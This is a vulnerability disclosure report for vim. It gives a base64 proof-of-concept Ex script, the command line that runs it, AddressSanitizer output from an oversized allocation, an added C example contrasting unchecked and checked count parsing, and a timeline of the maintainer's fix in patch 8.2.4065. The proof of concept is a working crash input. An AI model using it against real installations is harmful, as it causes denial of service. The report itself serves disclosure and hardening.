Allocation of Resources Without Limits or Throttling in vim/vim

Status: Valid

Reported on: Jan 10th 2022


Description

Memory Allocation with Excessive Size Value

Proof of Concept

base64 poc (decodes to ./poc):
aAp2ewp5Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3NzcKXQo=

Command:
vim -u NONE -X -Z -e -s -S ./poc -c :qa!

ASan output:
==1206187==ERROR: AddressSanitizer: requested allocation size 0xfffffffffffffff8 (0x7f8 after adjustments for alignment, red zones etc.) exceeds maximum supported size of 0x10000000000 (thread T0)
    #0 0x49626d in malloc (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x49626d)
    #1 0x4c5d75  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x4c5d75)
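The base64 PoC above decodes to four Ex-script lines: "h", "v{", "y" followed by a 26-digit run of sevens (a :yank with a count argument), and "]". A 26-digit count cannot fit in a signed 64-bit integer (LLONG_MAX has 19 digits), and the size ASan reports, 0xfffffffffffffff8, is (size_t)-8: a negative value cast to size_t, which is consistent with a count that wrapped before being turned into an allocation size. The following C program is an added example, not vim's code and not what patch 8.2.4065 does; it reproduces the bug class with the PoC count (copied from the decoded PoC), shows the naive accumulator wrapping and the resulting -8 request, and puts a checked parser and a checked allocator beside them. The cap value is a hypothetical policy limit, and __builtin_mul_overflow is a GCC/Clang builtin.

```c
/* Added example: not vim's code and not patch 8.2.4065.  It shows the bug
 * class behind the report: a numeric count taken from input without an
 * overflow check, multiplied into an allocation size and handed to
 * malloc(), beside a checked version that refuses such counts. */
#include <errno.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>

/* Taken from the decoded base64 PoC: its third line is "y" followed by this
 * 26-digit count (the Ex :yank command with a count argument). */
#define POC_COUNT "77777777777777777777777777"

/* Naive digit accumulator (the pattern that wraps).  The accumulation is
 * done in unsigned arithmetic so the wrap is well defined; the final cast
 * to a signed type is what turns a huge count into a negative one on
 * two's-complement compilers such as GCC and Clang. */
long long naive_count(const char *s)
{
    unsigned long long v = 0;
    while (*s >= '0' && *s <= '9')
        v = v * 10 + (unsigned long long)(*s++ - '0');
    return (long long)v;
}

/* Checked parser: strtoll sets ERANGE for a value past LLONG_MAX, and the
 * caller rejects zero, negative, empty and trailing-garbage input.
 * Returns 1 on success with the value stored in *out, 0 otherwise. */
int checked_count(const char *s, long long *out)
{
    char *end;
    long long v;

    errno = 0;
    v = strtoll(s, &end, 10);
    if (end == s || *end != '\0' || errno == ERANGE || v <= 0)
        return 0;
    *out = v;
    return 1;
}

/* Convenience wrapper: the parsed count, or -1 if checked_count rejects it. */
long long count_or_minus1(const char *s)
{
    long long v;
    return checked_count(s, &v) ? v : -1;
}

/* The unchecked size computation.  A count of -1 times an element size of 8
 * gives (size_t)-8, which is 0xfffffffffffffff8 on 64-bit: the exact
 * "requested allocation size" in the ASan report above. */
size_t naive_size(long long count, size_t elem)
{
    return (size_t)count * elem;
}

/* Hardened version: reject non-positive counts, an overflowing multiply
 * (__builtin_mul_overflow is a GCC/Clang builtin) and anything above an
 * explicit cap, returning NULL instead of calling malloc() with garbage.
 * The cap is a hypothetical policy value, not something vim defines. */
void *checked_alloc(long long count, size_t elem, size_t cap)
{
    size_t bytes;

    if (count <= 0)
        return NULL;
    if (__builtin_mul_overflow((size_t)count, elem, &bytes) || bytes > cap)
        return NULL;
    return malloc(bytes);
}

/* 1 if checked_alloc accepts the request (the memory is freed again), else 0. */
int checked_alloc_ok(long long count, size_t elem, size_t cap)
{
    void *p = checked_alloc(count, elem, cap);
    if (p == NULL)
        return 0;
    free(p);
    return 1;
}

int main(void)
{
    long long n;
    size_t cap = (size_t)1 << 30;   /* hypothetical 1 GiB ceiling */

    printf("naive_count(POC_COUNT)    = %lld (wrapped, meaningless)\n",
           naive_count(POC_COUNT));
    printf("checked_count(POC_COUNT)  = %d (0 = rejected)\n",
           checked_count(POC_COUNT, &n));
    printf("naive_size(-1, 8)         = %#zx\n", naive_size(-1, 8));
    printf("checked_alloc(-1, 8, cap) = %s\n",
           checked_alloc_ok(-1, 8, cap) ? "allocated" : "rejected");
    printf("checked_alloc(16, 8, cap) = %s\n",
           checked_alloc_ok(16, 8, cap) ? "allocated" : "rejected");
    return 0;
}
```

The point of the pair is that the parse and the multiply each need their own check: strtoll catches the digit overflow, __builtin_mul_overflow catches count times element size, and the cap catches requests that are arithmetically valid but still unreasonable. With only the last two in place a wrapped count would already have been rejected as negative, which is why the maintainer's observation that the allocation merely fails is the expected outcome for this input.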
Timeline

We are processing your report and will contact the vim team within 24 hours. (16 days ago)
We have contacted a member of the vim team and are waiting to hear back. (15 days ago)
Bram Moolenaar validated this vulnerability. (15 days ago)
aidaip has been awarded the disclosure bounty.
The fix bounty is now up for grabs.
Bram Moolenaar (Maintainer), 15 days ago:

I can reproduce the problem. It would cause the allocation to fail; I don't see any other side effect. I can solve it anyway.

Bram Moolenaar (Maintainer), 15 days ago:

Fixed by patch 8.2.4065, which adds a simple test based on the PoC.

Bram Moolenaar confirmed that a fix has been merged on 3cf21b. (15 days ago)
Bram Moolenaar has been awarded the fix bounty.